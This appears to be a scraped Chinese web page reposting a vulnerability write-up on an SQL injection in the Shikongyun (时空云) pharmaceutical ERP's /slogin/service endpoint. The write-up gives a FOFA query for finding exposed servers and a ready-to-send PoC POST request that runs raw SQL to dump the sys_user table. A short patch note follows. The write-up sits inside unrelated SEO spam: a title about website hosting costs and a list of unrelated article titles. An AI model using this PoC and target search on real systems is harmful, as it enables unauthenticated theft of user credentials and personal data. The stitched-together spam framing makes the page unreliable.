当前位置: 首页 > news >正文

濮阳网站公司网站租用服务器费用

濮阳网站公司,网站租用服务器费用,网站优化18600119496,网站建设工作自查报告0x01 产品简介 时空云社会化商业ERP(简称时空云ERP) ,该产品采用JAVA语言和Oracle数据库, 融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本…

0x01 产品简介

 时空云社会化商业ERP(简称时空云ERP) ,该产品采用JAVA语言和Oracle数据库, 融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本,最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标,是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。

0x02 漏洞概述

  时空云社会化商业ERP service接口处存在SQL注入漏洞,未授权的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息),甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:app="云时空社会化商业ERP系统"

0x04 漏洞复现 

PoC

POST /slogin/service?service=db.select HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 75params=%7B%22sql%22%3A%22select+%2A+from+sys_user+where+rownum+%3C+10%22%7D

查询系统用户表中所有列的9条数据

0x05 修复建议 

厂商已发布了漏洞修复程序,请及时关注更新:http://www.ysk360.com/

http://www.yayakq.cn/news/850183/

相关文章:

  • 学做网站论坛vip视频文学网站建设
  • 网站的组成商标 做网站 是几类
  • 网站开发微信小程序需求量大吗品牌建设总要求
  • 企业营销型网站做的好wordpress function.php 在哪里
  • 自学网站有哪些自学网紫金网站建设
  • 企业网站制作建设的框架有哪几种青岛自动seo
  • 微网站收费标准博客登陆wordpress
  • 建网站和开发网站app制作开发费用
  • 营销型网站建设_做网站怎样创建自己的网址
  • 延吉网站网站建设网站解封
  • 北京网站建设 招聘信息网站开发免费视频教程
  • 成都网站建设哪便宜哪个网站做外贸生意
  • 长春网站制作优势吉网传媒学历提升怎么找正规渠道
  • 上海网安备案网站做网站技术员
  • 重庆网站建设解决方案企业做网站建设遇到的问题
  • 网站制作者湖南网站建设企业
  • 想接外包做网站拍卖公司宣传册设计样本
  • flash做ppt的模板下载网站有哪些wordpress category模板
  • 网站的开发包括什么东西星子网新闻事件
  • 建网站的八个步骤苏州沧浪区做网站的
  • 做网站哪个公司最好企业网站前期建设方案案例
  • 网站值不值得做seo网站设计做什么
  • 海纳企业网站建设模板汕头市企业网站建设哪家好
  • 花80亿美元建空间站网页版查询系统制作
  • 网站建栏目建那些如何将aaa云主机做网站
  • 徐州网站二次开发seo工具助力集群式网站升级
  • 做网站多少钱西宁君博领先淘宝seo优化推广
  • 南安淘宝网站建设封装系统如何做自己的网站
  • 专做校园购物网站音乐网站开发需要什么语言工具
  • 宠物出售的网站怎么做it建设人才网